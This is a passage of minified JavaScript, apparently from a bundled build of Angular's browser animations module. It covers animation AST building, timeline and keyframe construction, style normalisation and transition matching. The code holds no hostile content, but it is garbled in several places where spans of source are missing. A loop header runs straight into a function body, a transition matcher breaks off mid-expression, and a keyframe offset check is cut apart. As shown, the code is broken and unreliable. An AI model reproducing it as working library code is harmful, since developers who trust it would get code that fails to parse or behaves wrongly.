og.style)),a}(e)}matchesElement(e,i){return!1}containsElement(e,i){return oO(e,i)}getParentElement(e){return x6(e)}query(e,i,n){return rO(e,i,n)}computeStyle(e,i,n){return n||""}animate(e,i,n,r,c,d=[],T){return new ly(n,r)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),w6=(()=>{class t{}return t.NOOP=new sO,t})();const I6="ng-enter",l4="ng-leave",d4="ng-trigger",m4=".ng-trigger",lO="ng-animating",R6=".ng-animating";function Ih(t){if("number"==typeof t)return t;const a=t.match(/^(-?[\.\d]+)(m?s)/);return!a||a.length<2?0:S6(parseFloat(a[1]),a[2])}function S6(t,a){return"s"===a?1e3*t:t}function u4(t,a,e){return t.hasOwnProperty("duration")?t:function Wce(t,a,e){let n,r=0,c="";if("string"==typeof t){const d=t.match(/^(-?[\.\d]+)(m?s)(?:\s+(-?[\.\d]+)(m?s))?(?:\s+([-a-z]+(?:\(.+?\))?))?$/i);if(null===d)return a.push(ZP()),{duration:0,delay:0,easing:""};n=S6(parseFloat(d[1]),d[2]);const T=d[3];null!=T&&(r=S6(parseFloat(T),d[4]));const k=d[5];k&&(c=k)}else n=t;if(!e){let d=!1,T=a.length;n<0&&(a.push(function Jse(){return new gi(3100,!1)}()),d=!0),r<0&&(a.push(function Zse(){return new gi(3101,!1)}()),d=!0),d&&a.splice(T,0,ZP())}return{duration:n,delay:r,easing:c}}(t,a,e)}function dy(t,a={}){return Object.keys(t).forEach(e=>{a[e]=t[e]}),a}function dO(t){const a=new Map;return Object.keys(t).forEach(e=>{a.set(e,t[e])}),a}function tp(t,a=new Map,e){if(e)for(let[i,n]of e)a.set(i,n);for(let[i,n]of t)a.set(i,n);return a}function uO(t,a,e){return e?a+":"+e+";":""}function hO(t){let a="";for(let e=0;e{const r=P6(n);e&&!e.has(n)&&e.set(n,t.style[r]),t.style[r]=i}),v6()&&hO(t))}function rg(t,a){t.style&&(a.forEach((e,i)=>{const n=P6(i);t.style[n]=""}),v6()&&hO(t))}function my(t){return Array.isArray(t)?1==t.length?t[0]:KP(t):t}const k6=new RegExp("{{\\s*(.+?)\\s*}}","g");function fO(t){let a=[];if("string"==typeof t){let e;for(;e=k6.exec(t);)a.push(e[1]);k6.lastIndex=0}return a}function uy(t,a,e){const i=t.toString(),n=i.replace(k6,(r,c)=>{let d=a[c];return null==d&&(e.push(function tce(t){return new gi(3003,!1)}()),d=""),d.toString()});return n==i?t:n}function h4(t){const a=[];let e=t.next();for(;!e.done;)a.push(e.value),e=t.next();return a}const Bce=/-+([a-z0-9])/g;function P6(t){return t.replace(Bce,(...a)=>a[1].toUpperCase())}function Hce(t){return t.replace(/([a-z])([A-Z])/g,"$1-$2").toLowerCase()}function jl(t,a,e){switch(a.type){case 7:return t.visitTrigger(a,e);case 0:return t.visitState(a,e);case 1:return t.visitTransition(a,e);case 2:return t.visitSequence(a,e);case 3:return t.visitGroup(a,e);case 4:return t.visitAnimate(a,e);case 5:return t.visitKeyframes(a,e);case 6:return t.visitStyle(a,e);case 8:return t.visitReference(a,e);case 9:return t.visitAnimateChild(a,e);case 10:return t.visitAnimateRef(a,e);case 11:return t.visitQuery(a,e);case 12:return t.visitStagger(a,e);default:throw function ice(t){return new gi(3004,!1)}()}}function pO(t,a){return window.getComputedStyle(t)[a]}function $ce(t,a){const e=[];return"string"==typeof t?t.split(/\s*,\s*/).forEach(i=>function Kce(t,a,e){if(":"==t[0]){const T=function Xce(t,a){switch(t){case":enter":return"void => *";case":leave":return"* => void";case":increment":return(e,i)=>parseFloat(i)>parseFloat(e);case":decrement":return(e,i)=>parseFloat(i) *"}}(t,e);if("function"==typeof T)return void a.push(T);t=T}const i=t.match(/^(\*|[-\w]+)\s*()\s*(\*|[-\w]+)$/);if(null==i||i.length<4)return e.push(function pce(t){return new gi(3015,!1)}()),a;const n=i[1],r=i[2],c=i[3];a.push(_O(n,c));"<"==r[0]&&!("*"==n&&"*"==c)&&a.push(_O(c,n))}(i,e,a)):e.push(t),e}const g4=new Set(["true","1"]),C4=new Set(["false","0"]);function _O(t,a){const e=g4.has(t)||C4.has(t),i=g4.has(a)||C4.has(a);return(n,r)=>{let c="*"==t||t==n,d="*"==a||a==r;return!c&&e&&"boolean"==typeof n&&(c=n?g4.has(t):C4.has(t)),!d&&i&&"boolean"==typeof r&&(d=r?g4.has(a):C4.has(a)),c&&d}}const Yce=new RegExp("s*:selfs*,?","g");function O6(t,a,e,i){return new Jce(t).build(a,e,i)}class Jce{constructor(a){this._driver=a}build(a,e,i){const n=new tle(e);return this._resetContextStyleTimingState(n),jl(this,my(a),n)}_resetContextStyleTimingState(a){a.currentQuerySelector="",a.collectedStyles=new Map,a.collectedStyles.set("",new Map),a.currentTime=0}visitTrigger(a,e){let i=e.queryCount=0,n=e.depCount=0;const r=[],c=[];return"@"==a.name.charAt(0)&&e.errors.push(function nce(){return new gi(3006,!1)}()),a.definitions.forEach(d=>{if(this._resetContextStyleTimingState(e),0==d.type){const T=d,k=T.name;k.toString().split(/\s*,\s*/).forEach(q=>{T.name=q,r.push(this.visitState(T,e))}),T.name=k}else if(1==d.type){const T=this.visitTransition(d,e);i+=T.queryCount,n+=T.depCount,c.push(T)}else e.errors.push(function oce(){return new gi(3007,!1)}())}),{type:7,name:a.name,states:r,transitions:c,queryCount:i,depCount:n,options:null}}visitState(a,e){const i=this.visitStyle(a.styles,e),n=a.options&&a.options.params||null;if(i.containsDynamicStyles){const r=new Set,c=n||{};i.styles.forEach(d=>{d instanceof Map&&d.forEach(T=>{fO(T).forEach(k=>{c.hasOwnProperty(k)||r.add(k)})})}),r.size&&(h4(r.values()),e.errors.push(function rce(t,a){return new gi(3008,!1)}()))}return{type:0,name:a.name,style:i,options:n?{params:n}:null}}visitTransition(a,e){e.queryCount=0,e.depCount=0;const i=jl(this,my(a.animation),e);return{type:1,matchers:$ce(a.expr,e.errors),animation:i,queryCount:e.queryCount,depCount:e.depCount,options:sg(a.options)}}visitSequence(a,e){return{type:2,steps:a.steps.map(i=>jl(this,i,e)),options:sg(a.options)}}visitGroup(a,e){const i=e.currentTime;let n=0;const r=a.steps.map(c=>{e.currentTime=i;const d=jl(this,c,e);return n=Math.max(n,e.currentTime),d});return e.currentTime=n,{type:3,steps:r,options:sg(a.options)}}visitAnimate(a,e){const i=function ale(t,a){if(t.hasOwnProperty("duration"))return t;if("number"==typeof t)return N6(u4(t,a).duration,0,"");const e=t;if(e.split(/\s+/).some(r=>"{"==r.charAt(0)&&"{"==r.charAt(1))){const r=N6(0,0,"");return r.dynamic=!0,r.strValue=e,r}const n=u4(e,a);return N6(n.duration,n.delay,n.easing)}(a.timings,e.errors);e.currentAnimateTimings=i;let n,r=a.styles?a.styles:zi({});if(5==r.type)n=this.visitKeyframes(r,e);else{let c=a.styles,d=!1;if(!c){d=!0;const k={};i.easing&&(k.easing=i.easing),c=zi(k)}e.currentTime+=i.duration+i.delay;const T=this.visitStyle(c,e);T.isEmptyStep=d,n=T}return e.currentAnimateTimings=null,{type:4,timings:i,style:n,options:null}}visitStyle(a,e){const i=this._makeStyleAst(a,e);return this._validateStyleAst(i,e),i}_makeStyleAst(a,e){const i=[],n=Array.isArray(a.styles)?a.styles:[a.styles];for(let d of n)"string"==typeof d?d===wh?i.push(d):e.errors.push(new gi(3002,!1)):i.push(dO(d));let r=!1,c=null;return i.forEach(d=>{if(d instanceof Map&&(d.has("easing")&&(c=d.get("easing"),d.delete("easing")),!r))for(let T of d.values())if(T.toString().indexOf("{{")>=0){r=!0;break}}),{type:6,styles:i,easing:c,offset:a.offset,containsDynamicStyles:r,options:null}}_validateStyleAst(a,e){const i=e.currentAnimateTimings;let n=e.currentTime,r=e.currentTime;i&&r>0&&(r-=i.duration+i.delay),a.styles.forEach(c=>{"string"!=typeof c&&c.forEach((d,T)=>{const k=e.collectedStyles.get(e.currentQuerySelector),q=k.get(T);let Y=!0;q&&(r!=n&&r>=q.startTime&&n<=q.endTime&&(e.errors.push(function cce(t,a,e,i,n){return new gi(3010,!1)}()),Y=!1),r=q.startTime),Y&&k.set(T,{startTime:r,endTime:n}),e.options&&function Vce(t,a,e){const i=a.params||{},n=fO(t);n.length&&n.forEach(r=>{i.hasOwnProperty(r)||e.push(function ece(t){return new gi(3001,!1)}())})}(d,e.options,e.errors)})})}visitKeyframes(a,e){const i={type:5,styles:[],options:null};if(!e.currentAnimateTimings)return e.errors.push(function lce(){return new gi(3011,!1)}()),i;let r=0;const c=[];let d=!1,T=!1,k=0;const q=a.steps.map(et=>{const ut=this._makeStyleAst(et,e);let Ze=null!=ut.offset?ut.offset:function ile(t){if("string"==typeof t)return null;let a=null;if(Array.isArray(t))t.forEach(e=>{if(e instanceof Map&&e.has("offset")){const i=e;a=parseFloat(i.get("offset")),i.delete("offset")}});else if(t instanceof Map&&t.has("offset")){const e=t;a=parseFloat(e.get("offset")),e.delete("offset")}return a}(ut.styles),yt=0;return null!=Ze&&(r++,yt=ut.offset=Ze),T=T||yt<0||yt>1,d=d||yt0&&r{const Ze=te>0?ut==pe?1:te*ut:c[ut],yt=Ze*Ne;e.currentTime=Re+Fe.delay+yt,Fe.duration=yt,this._validateStyleAst(et,e),et.offset=Ze,i.styles.push(et)}),i}visitReference(a,e){return{type:8,animation:jl(this,my(a.animation),e),options:sg(a.options)}}visitAnimateChild(a,e){return e.depCount++,{type:9,options:sg(a.options)}}visitAnimateRef(a,e){return{type:10,animation:this.visitReference(a.animation,e),options:sg(a.options)}}visitQuery(a,e){const i=e.currentQuerySelector,n=a.options||{};e.queryCount++,e.currentQuery=a;const[r,c]=function Zce(t){const a=!!t.split(/\s*,\s*/).find(e=>":self"==e);return a&&(t=t.replace(Yce,"")),t=t.replace(/@\*/g,m4).replace(/@\w+/g,e=>m4+"-"+e.slice(1)).replace(/:animating/g,R6),[t,a]}(a.selector);e.currentQuerySelector=i.length?i+" "+r:r,Gl(e.collectedStyles,e.currentQuerySelector,new Map);const d=jl(this,my(a.animation),e);return e.currentQuery=null,e.currentQuerySelector=i,{type:11,selector:r,limit:n.limit||0,optional:!!n.optional,includeSelf:c,animation:d,originalSelector:a.selector,options:sg(a.options)}}visitStagger(a,e){e.currentQuery||e.errors.push(function hce(){return new gi(3013,!1)}());const i="full"===a.timings?{duration:0,delay:0,easing:"full"}:u4(a.timings,e.errors,!0);return{type:12,animation:jl(this,my(a.animation),e),timings:i,options:null}}}class tle{constructor(a){this.errors=a,this.queryCount=0,this.depCount=0,this.currentTransition=null,this.currentQuery=null,this.currentQuerySelector=null,this.currentAnimateTimings=null,this.currentTime=0,this.collectedStyles=new Map,this.options=null,this.unsupportedCSSPropertiesFound=new Set}}function sg(t){return t?(t=dy(t)).params&&(t.params=function ele(t){return t?dy(t):null}(t.params)):t={},t}function N6(t,a,e){return{duration:t,delay:a,easing:e}}function L6(t,a,e,i,n,r,c=null,d=!1){return{type:1,element:t,keyframes:a,preStyleProps:e,postStyleProps:i,duration:n,delay:r,totalTime:n+r,easing:c,subTimeline:d}}class y4{constructor(){this._map=new Map}get(a){return this._map.get(a)||[]}append(a,e){let i=this._map.get(a);i||this._map.set(a,i=[]),i.push(...e)}has(a){return this._map.has(a)}clear(){this._map.clear()}}const rle=new RegExp(":enter","g"),cle=new RegExp(":leave","g");function z6(t,a,e,i,n,r=new Map,c=new Map,d,T,k=[]){return(new lle).buildKeyframes(t,a,e,i,n,r,c,d,T,k)}class lle{buildKeyframes(a,e,i,n,r,c,d,T,k,q=[]){k=k||new y4;const Y=new W6(a,e,k,n,r,q,[]);Y.options=T;const te=T.delay?Ih(T.delay):0;Y.currentTimeline.delayNextStep(te),Y.currentTimeline.setStyles([c],null,Y.errors,T),jl(this,i,Y);const pe=Y.timelines.filter(Re=>Re.containsAnimation());if(pe.length&&d.size){let Re;for(let Fe=pe.length-1;Fe>=0;Fe--){const Ne=pe[Fe];if(Ne.element===e){Re=Ne;break}}Re&&!Re.allowOnlyTimelineStyles()&&Re.setStyles([d],null,Y.errors,T)}return pe.length?pe.map(Re=>Re.buildKeyframes()):[L6(e,[],[],[],0,te,"",!1)]}visitTrigger(a,e){}visitState(a,e){}visitTransition(a,e){}visitAnimateChild(a,e){const i=e.subInstructions.get(e.element);if(i){const n=e.createSubContext(a.options),r=e.currentTimeline.currentTime,c=this._visitSubInstructions(i,n,n.options);r!=c&&e.transformIntoNewTimeline(c)}e.previousNode=a}visitAnimateRef(a,e){const i=e.createSubContext(a.options);i.transformIntoNewTimeline(),this._applyAnimationRefDelays([a.options,a.animation.options],e,i),this.visitReference(a.animation,i),e.transformIntoNewTimeline(i.currentTimeline.currentTime),e.previousNode=a}_applyAnimationRefDelays(a,e,i){var n;for(const r of a){const c=null==r?void 0:r.delay;if(c){const d="number"==typeof c?c:Ih(uy(c,null!==(n=null==r?void 0:r.params)&&void 0!==n?n:{},e.errors));i.delayNextStep(d)}}}_visitSubInstructions(a,e,i){let r=e.currentTimeline.currentTime;const c=null!=i.duration?Ih(i.duration):null,d=null!=i.delay?Ih(i.delay):null;return 0!==c&&a.forEach(T=>{const k=e.appendInstructionToTimeline(T,c,d);r=Math.max(r,k.duration+k.delay)}),r}visitReference(a,e){e.updateOptions(a.options,!0),jl(this,a.animation,e),e.previousNode=a}visitSequence(a,e){const i=e.subContextCount;let n=e;const r=a.options;if(r&&(r.params||r.delay)&&(n=e.createSubContext(r),n.transformIntoNewTimeline(),null!=r.delay)){6==n.previousNode.type&&(n.currentTimeline.snapshotCurrentStyles(),n.previousNode=b4);const c=Ih(r.delay);n.delayNextStep(c)}a.steps.length&&(a.steps.forEach(c=>jl(this,c,n)),n.currentTimeline.applyStylesToKeyframe(),n.subContextCount>i&&n.transformIntoNewTimeline()),e.previousNode=a}visitGroup(a,e){const i=[];let n=e.currentTimeline.currentTime;const r=a.options&&a.options.delay?Ih(a.options.delay):0;a.steps.forEach(c=>{const d=e.createSubContext(a.options);r&&d.delayNextStep(r),jl(this,c,d),n=Math.max(n,d.currentTimeline.currentTime),i.push(d.currentTimeline)}),i.forEach(c=>e.currentTimeline.mergeTimelineCollectedStyles(c)),e.transformIntoNewTimeline(n),e.previousNode=a}_visitTiming(a,e){if(a.dynamic){const i=a.strValue;return u4(e.params?uy(i,e.params,e.errors):i,e.errors)}return{duration:a.duration,delay:a.delay,easing:a.easing}}visitAnimate(a,e){const i=e.currentAnimateTimings=this._visitTiming(a.timings,e),n=e.currentTimeline;i.delay&&(e.incrementTime(i.delay),n.snapshotCurrentStyles());const r=a.style;5==r.type?this.visitKeyframes(r,e):(e.incrementTime(i.duration),this.visitStyle(r,e),n.applyStylesToKeyframe()),e.currentAnimateTimings=null,e.previousNode=a}visitStyle(a,e){const i=e.currentTimeline,n=e.currentAnimateTimings;!n&&i.hasCurrentStyleProperties()&&i.forwardFrame();const r=n&&n.easing||a.easing;a.isEmptyStep?i.applyEmptyStep(r):i.setStyles(a.styles,r,e.errors,e.options),e.previousNode=a}visitKeyframes(a,e){const i=e.currentAnimateTimings,n=e.currentTimeline.duration,r=i.duration,d=e.createSubContext().currentTimeline;d.easing=i.easing,a.styles.forEach(T=>{d.forwardTime((T.offset||0)*r),d.setStyles(T.styles,T.easing,e.errors,e.options),d.applyStylesToKeyframe()}),e.currentTimeline.mergeTimelineCollectedStyles(d),e.transformIntoNewTimeline(n+r),e.previousNode=a}visitQuery(a,e){const i=e.currentTimeline.currentTime,n=a.options||{},r=n.delay?Ih(n.delay):0;r&&(6===e.previousNode.type||0==i&&e.currentTimeline.hasCurrentStyleProperties())&&(e.currentTimeline.snapshotCurrentStyles(),e.previousNode=b4);let c=i;const d=e.invokeQuery(a.selector,a.originalSelector,a.limit,a.includeSelf,!!n.optional,e.errors);e.currentQueryTotal=d.length;let T=null;d.forEach((k,q)=>{e.currentQueryIndex=q;const Y=e.createSubContext(a.options,k);r&&Y.delayNextStep(r),k===e.element&&(T=Y.currentTimeline),jl(this,a.animation,Y),Y.currentTimeline.applyStylesToKeyframe(),c=Math.max(c,Y.currentTimeline.currentTime)}),e.currentQueryIndex=0,e.currentQueryTotal=0,e.transformIntoNewTimeline(c),T&&(e.currentTimeline.mergeTimelineCollectedStyles(T),e.currentTimeline.snapshotCurrentStyles()),e.previousNode=a}visitStagger(a,e){const i=e.parentContext,n=e.currentTimeline,r=a.timings,c=Math.abs(r.duration),d=c*(e.currentQueryTotal-1);let T=c*e.currentQueryIndex;switch(r.duration<0?"reverse":r.easing){case"reverse":T=d-T;break;case"full":T=i.currentStaggerTime}const q=e.currentTimeline;T&&q.delayNextStep(T);const Y=q.currentTime;jl(this,a.animation,e),e.previousNode=a,i.currentStaggerTime=n.currentTime-Y+(n.startTime-i.currentTimeline.startTime)}}const b4={};class W6{constructor(a,e,i,n,r,c,d,T){this._driver=a,this.element=e,this.subInstructions=i,this._enterClassName=n,this._leaveClassName=r,this.errors=c,this.timelines=d,this.parentContext=null,this.currentAnimateTimings=null,this.previousNode=b4,this.subContextCount=0,this.options={},this.currentQueryIndex=0,this.currentQueryTotal=0,this.currentStaggerTime=0,this.currentTimeline=T||new M4(this._driver,e,0),d.push(this.currentTimeline)}get params(){return this.options.params}updateOptions(a,e){if(!a)return;const i=a;let n=this.options;null!=i.duration&&(n.duration=Ih(i.duration)),null!=i.delay&&(n.delay=Ih(i.delay));const r=i.params;if(r){let c=n.params;c||(c=this.options.params={}),Object.keys(r).forEach(d=>{(!e||!c.hasOwnProperty(d))&&(c[d]=uy(r[d],c,this.errors))})}}_copyOptions(){const a={};if(this.options){const e=this.options.params;if(e){const i=a.params={};Object.keys(e).forEach(n=>{i[n]=e[n]})}}return a}createSubContext(a=null,e,i){const n=e||this.element,r=new W6(this._driver,n,this.subInstructions,this._enterClassName,this._leaveClassName,this.errors,this.timelines,this.currentTimeline.fork(n,i||0));return r.previousNode=this.previousNode,r.currentAnimateTimings=this.currentAnimateTimings,r.options=this._copyOptions(),r.updateOptions(a),r.currentQueryIndex=this.currentQueryIndex,r.currentQueryTotal=this.currentQueryTotal,r.parentContext=this,this.subContextCount++,r}transformIntoNewTimeline(a){return this.previousNode=b4,this.currentTimeline=this.currentTimeline.fork(this.element,a),this.timelines.push(this.currentTimeline),this.currentTimeline}appendInstructionToTimeline(a,e,i){const n={duration:null!=e?e:a.duration,delay:this.currentTimeline.currentTime+(null!=i?i:0)+a.delay,easing:""},r=new dle(this._driver,a.element,a.keyframes,a.preStyleProps,a.postStyleProps,n,a.stretchStartingKeyframe);return this.timelines.push(r),n}incrementTime(a){this.currentTimeline.forwardTime(this.currentTimeline.duration+a)}delayNextStep(a){a>0&&this.currentTimeline.delayNextStep(a)}invokeQuery(a,e,i,n,r,c){let d=[];if(n&&d.push(this.element),a.length>0){a=(a=a.replace(rle,"."+this._enterClassName)).replace(cle,"."+this._leaveClassName);let k=this._driver.query(this.element,a,1!=i);0!==i&&(k=i<0?k.slice(k.length+i,k.length):k.slice(0,i)),d.push(...k)}return!r&&0==d.length&&c.push(function fce(t){return new gi(3014,!1)}()),d}}class M4{constructor(a,e,i,n){this._driver=a,this.element=e,this.startTime=i,this._elementTimelineStylesLookup=n,this.duration=0,this._previousKeyframe=new Map,this._currentKeyframe=new Map,this._keyframes=new Map,this._styleSummary=new Map,this._localTimelineStyles=new Map,this._pendingStyles=new Map,this._backFill=new Map,this._currentEmptyStepKeyframe=null,this._elementTimelineStylesLookup||(this._elementTimelineStylesLookup=new Map),this._globalTimelineStyles=this._elementTimelineStylesLookup.get(e),this._globalTimelineStyles||(this._globalTimelineStyles=this._localTimelineStyles,this._elementTimelineStylesLookup.set(e,this._localTimelineStyles)),this._loadKeyframe()}containsAnimation(){switch(this._keyframes.size){case 0:return!1;case 1:return this.hasCurrentStyleProperties();default:return!0}}hasCurrentStyleProperties(){return this._currentKeyframe.size>0}get currentTime(){return this.startTime+this.duration}delayNextStep(a){const e=1===this._keyframes.size&&this._pendingStyles.size;this.duration||e?(this.forwardTime(this.currentTime+a),e&&this.snapshotCurrentStyles()):this.startTime+=a}fork(a,e){return this.applyStylesToKeyframe(),new M4(this._driver,a,e||this.currentTime,this._elementTimelineStylesLookup)}_loadKeyframe(){this._currentKeyframe&&(this._previousKeyframe=this._currentKeyframe),this._currentKeyframe=this._keyframes.get(this.duration),this._currentKeyframe||(this._currentKeyframe=new Map,this._keyframes.set(this.duration,this._currentKeyframe))}forwardFrame(){this.duration+=1,this._loadKeyframe()}forwardTime(a){this.applyStylesToKeyframe(),this.duration=a,this._loadKeyframe()}_updateStyle(a,e){this._localTimelineStyles.set(a,e),this._globalTimelineStyles.set(a,e),this._styleSummary.set(a,{time:this.currentTime,value:e})}allowOnlyTimelineStyles(){return this._currentEmptyStepKeyframe!==this._currentKeyframe}applyEmptyStep(a){a&&this._previousKeyframe.set("easing",a);for(let[e,i]of this._globalTimelineStyles)this._backFill.set(e,i||wh),this._currentKeyframe.set(e,wh);this._currentEmptyStepKeyframe=this._currentKeyframe}setStyles(a,e,i,n){var r;e&&this._previousKeyframe.set("easing",e);const c=n&&n.params||{},d=function mle(t,a){const e=new Map;let i;return t.forEach(n=>{if("*"===n){i=i||a.keys();for(let r of i)e.set(r,wh)}else tp(n,e)}),e}(a,this._globalTimelineStyles);for(let[T,k]of d){const q=uy(k,c,i);this._pendingStyles.set(T,q),this._localTimelineStyles.has(T)||this._backFill.set(T,null!==(r=this._globalTimelineStyles.get(T))&&void 0!==r?r:wh),this._updateStyle(T,q)}}applyStylesToKeyframe(){0!=this._pendingStyles.size&&(this._pendingStyles.forEach((a,e)=>{this._currentKeyframe.set(e,a)}),this._pendingStyles.clear(),this._localTimelineStyles.forEach((a,e)=>{this._currentKeyframe.has(e)||this._currentKeyframe.set(e,a)}))}snapshotCurrentStyles(){for(let[a,e]of this._localTimelineStyles)this._pendingStyles.set(a,e),this._updateStyle(a,e)}getFinalKeyframe(){return this._keyframes.get(this.duration)}get properties(){const a=[];for(let e in this._currentKeyframe)a.push(e);return a}mergeTimelineCollectedStyles(a){a._styleSummary.forEach((e,i)=>{const n=this._styleSummary.get(i);(!n||e.time>n.time)&&this._updateStyle(i,e.value)})}buildKeyframes(){this.applyStylesToKeyframe();const a=new Set,e=new Set,i=1===this._keyframes.size&&0===this.duration;let n=[];this._keyframes.forEach((d,T)=>{const k=tp(d,new Map,this._backFill);k.forEach((q,Y)=>{"!"===q?a.add(Y):q===wh&&e.add(Y)}),i||k.set("offset",T/this.duration),n.push(k)});const r=a.size?h4(a.values()):[],c=e.size?h4(e.values()):[];if(i){const d=n[0],T=new Map(d);d.set("offset",0),T.set("offset",1),n=[d,T]}return L6(this.element,n,r,c,this.duration,this.startTime,this.easing,!1)}}class dle extends M4{constructor(a,e,i,n,r,c,d=!1){super(a,e,c.delay),this.keyframes=i,this.preStyleProps=n,this.postStyleProps=r,this._stretchStartingKeyframe=d,this.timings={duration:c.duration,delay:c.delay,easing:c.easing}}containsAnimation(){return this.keyframes.length>1}buildKeyframes(){let a=this.keyframes,{delay:e,duration:i,easing:n}=this.timings;if(this._stretchStartingKeyframe&&e){const r=[],c=i+e,d=e/c,T=tp(a[0]);T.set("offset",0),r.push(T);const k=tp(a[0]);k.set("offset",yO(d)),r.push(k);const q=a.length-1;for(let Y=1;Y<=q;Y++){let te=tp(a[Y]);const pe=te.get("offset");te.set("offset",yO((e+pe*i)/c)),r.push(te)}i=c,e=0,n="",a=r}return L6(this.element,a,this.preStyleProps,this.postStyleProps,i,e,n,!0)}}function yO(t,a=3){const e=Math.pow(10,a-1);return Math.round(t*e)/e}class F6{}const ule=new Set(["width","height","minWidth","minHeight","maxWidth","maxHeight","left","top","bottom","right","fontSize","outlineWidth","outlineOffset","paddingTop","paddingLeft","paddingBottom","paddingRight","marginTop","marginLeft","marginBottom","marginRight","borderRadius","borderWidth","borderTopWidth","borderLeftWidth","borderRightWidth","borderBottomWidth","textIndent","perspective"]);class hle extends F6{normalizePropertyName(a,e){return P6(a)}normalizeStyleValue(a,e,i,n){let r="";const c=i.toString().trim();if(ule.has(e)&&0!==i&&"0"!==i)if("number"==typeof i)r="px";else{const d=i.match(/^[+-]?[\d\.]+([a-z]*)$/);d&&0==d[1].length&&n.push(function ace(t,a){return new gi(3005,!1)}())}return c+r}}function bO(t,a,e,i,n,r,c,d,T,k,q,Y,te){return{type:0,element:t,triggerName:a,isRemovalTransition:n,fromState:e,fromStyles:r,toState:i,toStyles:c,timelines:d,queriedElements:T,preStyleProps:k,postStyleProps:q,totalTime:Y,errors:te}}const V6={};class MO{constructor(a,e,i){this._triggerName=a,this.ast=e,this._stateStyles=i}match(a,e,i,n){return function fle(t,a,e,i,n){return t.some(r=>r(a,e,i,n))}(this.ast.matchers,a,e,i,n)}buildStyles(a,e,i){let n=this._stateStyles.get("*");return void 0!==a&&(n=this._stateStyles.get(null==a?void 0:a.toString())||n),n?n.buildStyles(e,i):new Map}build(a,e,i,n,r,c,d,T,k,q){var Y;const te=[],pe=this.ast.options&&this.ast.options.params||V6,Fe=this.buildStyles(i,d&&d.params||V6,te),Ne=T&&T.params||V6,et=this.buildStyles(n,Ne,te),ut=new Set,Ze=new Map,yt=new Map,It="void"===n,St={params:ple(Ne,pe),delay:null===(Y=this.ast.options)||void 0===Y?void 0:Y.delay},Nt=q?[]:z6(a,e,this.ast.animation,r,c,Fe,et,St,k,te);let oi=0;if(Nt.forEach(vi=>{oi=Math.max(vi.duration+vi.delay,oi)}),te.length)return bO(e,this._triggerName,i,n,It,Fe,et,[],[],Ze,yt,oi,te);Nt.forEach(vi=>{const xi=vi.element,Za=Gl(Ze,xi,new Set);vi.preStyleProps.forEach(en=>Za.add(en));const wa=Gl(yt,xi,new Set);vi.postStyleProps.forEach(en=>wa.add(en)),xi!==e&&ut.add(xi)});const Ai=h4(ut.values());return bO(e,this._triggerName,i,n,It,Fe,et,Nt,Ai,Ze,yt,oi)}}function ple(t,a){const e=dy(a);for(const i in t)t.hasOwnProperty(i)&&null!=t[i]&&(e[i]=t[i]);return e}class _le{constructor(a,e,i){this.styles=a,this.defaultParams=e,this.normalizer=i}buildStyles(a,e){const i=new Map,n=dy(this.defaultParams);return Object.keys(a).forEach(r=>{const c=a[r];null!==c&&(n[r]=c)}),this.styles.styles.forEach(r=>{"string"!=typeof r&&r.forEach((c,d)=>{c&&(c=uy(c,n,e));const T=this.normalizer.normalizePropertyName(d,e);c=this.normalizer.normalizeStyleValue(d,T,c,e),i.set(T,c)})}),i}}class Cle{constructor(a,e,i){this.name=a,this.ast=e,this._normalizer=i,this.transitionFactories=[],this.states=new Map,e.states.forEach(n=>{this.states.set(n.name,new _le(n.style,n.options&&n.options.params||{},i))}),vO(this.states,"true","1"),vO(this.states,"false","0"),e.transitions.forEach(n=>{this.transitionFactories.push(new MO(a,n,this.states))}),this.fallbackTransition=function yle(t,a,e){return new MO(t,{type:1,animation:{type:2,steps:[],options:null},matchers:[(c,d)=>!0],options:null,queryCount:0,depCount:0},a)}(a,this.states)}get containsQueries(){return this.ast.queryCount>0}matchTransition(a,e,i,n){return this.transitionFactories.find(c=>c.match(a,e,i,n))||null}matchStyles(a,e,i){return this.fallbackTransition.buildStyles(a,e,i)}}function vO(t,a,e){t.has(a)?t.has(e)||t.set(e,t.get(a)):t.has(e)&&t.set(a,t.get(e))}const ble=new y4;class Mle{constructor(a,e,i){this.bodyNode=a,this._driver=e,this._normalizer=i,this._animations=new Map,this._playersById=new Map,this.players=[]}register(a,e){const i=[],r=O6(this._driver,e,i,[]);if(i.length)throw function Mce(t){return new gi(3503,!1)}();this._animations.set(a,r)}_buildPlayer(a,e,i){const n=a.element,r=eO(0,this._normalizer,0,a.keyframes,e,i);return this._driver.animate(n,r,a.duration,a.delay,a.easing,[],!0)}create(a,e,i={}){const n=[],r=this._animations.get(a);let c;const d=new Map;if(r?(c=z6(this._driver,e,r,I6,l4,new Map,new Map,i,ble,n),c.forEach(q=>{const Y=Gl(d,q.element,new Map);q.postStyleProps.forEach(te=>Y.set(te,null))})):(n.push(function vce(){return new gi(3300,!1)}()),c=[]),n.length)throw function Ace(t){return new gi(3504,!1)}();d.forEach((q,Y)=>{q.forEach((te,pe)=>{q.set(pe,this._driver.computeStyle(Y,pe,wh))})});const k=ep(c.map(q=>{const Y=d.get(q.element);return this._buildPlayer(q,new Map,Y)}));return this._playersById.set(a,k),k.onDestroy(()=>this.destroy(a)),this.players.push(k),k}destroy(a){const e=this._getPlayer(a);e.destroy(),this._playersById.delete(a);const i=this.players.indexOf(e);i>=0&&this.players.splice(i,1)}_getPlayer(a){const e=this._playersById.get(a);if(!e)throw function Tce(t){return new gi(3301,!1)}();return e}listen(a,e,i,n){const r=E6(e,"","","");return A6(this._getPlayer(a),i,r,n),()=>{}}command(a,e,i,n){if("register"==i)return void this.register(a,n[0]);if("create"==i)return void this.create(a,e,n[0]||{});const r=this._getPlayer(a);switch(i){case"play":r.play();break;case"pause":r.pause();break;case"reset":r.reset();break;case"restart":r.restart();break;case"finish":r.finish();break;case"init":r.init();break;case"setPosition":r.setPosition(parseFloat(n[0]));break;case"destroy":this.destroy(a)}}}const AO="ng-animate-queued",B6="ng-animate-disabled",Dle=[],TO={namespaceId:"",setForRemoval:!1,setForMove:!1,hasAnimation:!1,removedBeforeQueried:!1},xle={namespaceId:"",setForMove:!1,setForRemoval:!1,hasAnimation:!1,removedBeforeQueried:!0},vd="__ng_removed";class H6{constructor(a,e=""){this.namespaceId=e;const i=a&&a.hasOwnProperty("value");if(this.value=function Sle(t){return null!=t?t:null}(i?a.value:a),i){const r=dy(a);delete r.value,this.options=r}else this.options={};this.options.params||(this.options.params={})}get params(){return this.options.params}absorbOptions(a){const e=a.params;if(e){const 